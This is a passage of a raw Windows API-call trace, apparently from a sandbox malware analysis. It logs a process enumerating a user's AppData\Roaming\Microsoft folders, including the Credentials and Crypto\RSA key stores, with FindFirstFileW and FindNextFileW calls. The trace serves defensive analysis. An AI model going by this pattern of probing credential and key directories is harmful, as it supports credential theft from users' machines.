ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6ef05590, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x3d639, dwReserved0=0x0, dwReserved1=0x0, cFileName="GostTitle.XSL", cAlternateFileName="GOSTTI~1.XSL")) returned 1 [0220.188] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c7ab8, Size=0x7e) returned 0x2fa200 [0220.189] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6ef779b0, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x45882, dwReserved0=0x0, dwReserved1=0x0, cFileName="HarvardAnglia2008OfficeOnline.xsl", cAlternateFileName="HARVAR~1.XSL")) returned 1 [0220.189] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c7ab8, Size=0x7e) returned 0x2fa200 [0220.189] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6fac6230, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x47e7d, dwReserved0=0x0, dwReserved1=0x0, cFileName="IEEE2006OfficeOnline.xsl", cAlternateFileName="IEEE20~1.XSL")) returned 1 [0220.190] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c7ab8, Size=0x7e) returned 0x2fa200 [0220.190] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6fa2dcb0, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x42132, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISO690.XSL", cAlternateFileName="")) returned 1 [0220.190] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c7ab8, Size=0x7e) returned 0x2fa200 [0220.191] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6fa2dcb0, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x351ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISO690Nmerical.XSL", cAlternateFileName="ISO690~1.XSL")) returned 1 [0220.191] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c7ab8, Size=0x7e) returned 0x2fa200 [0220.191] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6f629790, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x3e4f3, dwReserved0=0x0, dwReserved1=0x0, cFileName="MLASeventhEditionOfficeOnline.xsl", cAlternateFileName="MLASEV~1.XSL")) returned 1 [0220.192] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c7ab8, Size=0x7e) returned 0x2fa200 [0220.192] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x6ff88e30, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x3d5c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SIST02.XSL", cAlternateFileName="")) returned 1 [0220.193] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c7ab8, Size=0x7e) returned 0x2fa200 [0220.193] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2861ac30, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2861ac30, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x70497cf0, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0x0, dwReserved1=0x0, cFileName="TURABIAN.XSL", cAlternateFileName="")) returned 1 [0220.193] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c7ab8, Size=0x7e) returned 0x2fa200 [0220.194] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.194] GetLastError () returned 0x12 [0220.195] FindNextFileW (in: hFindFile=0x2eb468, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.195] GetLastError () returned 0x12 [0220.195] FindNextFileW (in: hFindFile=0x2eb428, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0220.196] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x58) returned 0x2e1620 [0220.196] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4a8, Size=0x70) returned 0x2e6040 [0220.196] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfc80, Size=0x40) returned 0x2c7908 [0220.196] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c7908, Size=0x80) returned 0x2fa200 [0220.197] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4a8 [0220.197] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.197] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0220.197] GetLastError () returned 0x12 [0220.197] FindNextFileW (in: hFindFile=0x2eb428, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0220.198] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x58) returned 0x2e1620 [0220.198] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4a8, Size=0x66) returned 0x2f7508 [0220.198] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfc80, Size=0x38) returned 0x2eb4a8 [0220.198] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4a8, Size=0x70) returned 0x2e6040 [0220.198] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4a8 [0220.199] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.199] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1 [0220.200] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4e8, Size=0x66) returned 0x2f7508 [0220.200] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb528, Size=0x6e) returned 0x2e6040 [0220.200] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfc80, Size=0x3c) returned 0x2c7908 [0220.200] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c7908, Size=0x78) returned 0x2c0b20 [0220.200] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb528 [0220.201] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.201] FindNextFileW (in: hFindFile=0x2eb528, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0220.201] GetLastError () returned 0x12 [0220.201] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.201] GetLastError () returned 0x12 [0220.201] FindNextFileW (in: hFindFile=0x2eb428, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0220.201] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x58) returned 0x2e1620 [0220.201] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c6680, Size=0x8a) returned 0x2e6040 [0220.202] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x4c) returned 0x2f8fe0 [0220.202] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f8fe0, Size=0x98) returned 0x2f3978 [0220.202] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb468 [0220.203] FindNextFileW (in: hFindFile=0x2eb468, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.203] FindNextFileW (in: hFindFile=0x2eb468, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0220.204] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c6680, Size=0x8a) returned 0x2e6040 [0220.204] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f9038, Size=0x94) returned 0x2f3978 [0220.204] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x50) returned 0x2f9038 [0220.204] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f9038, Size=0xa0) returned 0x2f6e58 [0220.204] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4a8 [0220.205] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.205] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 1 [0220.205] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f9038, Size=0x94) returned 0x2e6040 [0220.205] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f9090, Size=0x9a) returned 0x2f3978 [0220.205] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x54) returned 0x2e1620 [0220.206] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2e1620, Size=0xa8) returned 0x2f6e58 [0220.206] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4e8 [0220.206] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ed6d8, Size=0x1340) returned 0x2fef48 [0220.207] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.207] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x72af9fb0, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x388cc7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 1 [0220.207] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f9090, Size=0x9a) returned 0x2e6040 [0220.207] FindNextFileW (in: hFindFile=0x2eb4e8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.207] GetLastError () returned 0x12 [0220.208] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.208] GetLastError () returned 0x12 [0220.208] FindNextFileW (in: hFindFile=0x2eb468, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0220.208] GetLastError () returned 0x12 [0220.208] FindNextFileW (in: hFindFile=0x2eb428, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel", cAlternateFileName="")) returned 1 [0220.208] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x58) returned 0x2e1620 [0220.208] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4a8, Size=0x64) returned 0x2f7508 [0220.209] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfc80, Size=0x38) returned 0x2eb4a8 [0220.209] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4a8, Size=0x70) returned 0x2e6040 [0220.209] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Excel\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2eb4a8 [0220.210] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0220.210] FindNextFileW (in: hFindFile=0x2eb4a8, lpFindFileData=0x27d6f8 | out: lpFindFileData=0x27d6f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSTART", cAlternateFileName="")) returned 1 [0220.210] RtlReAllocateHeap 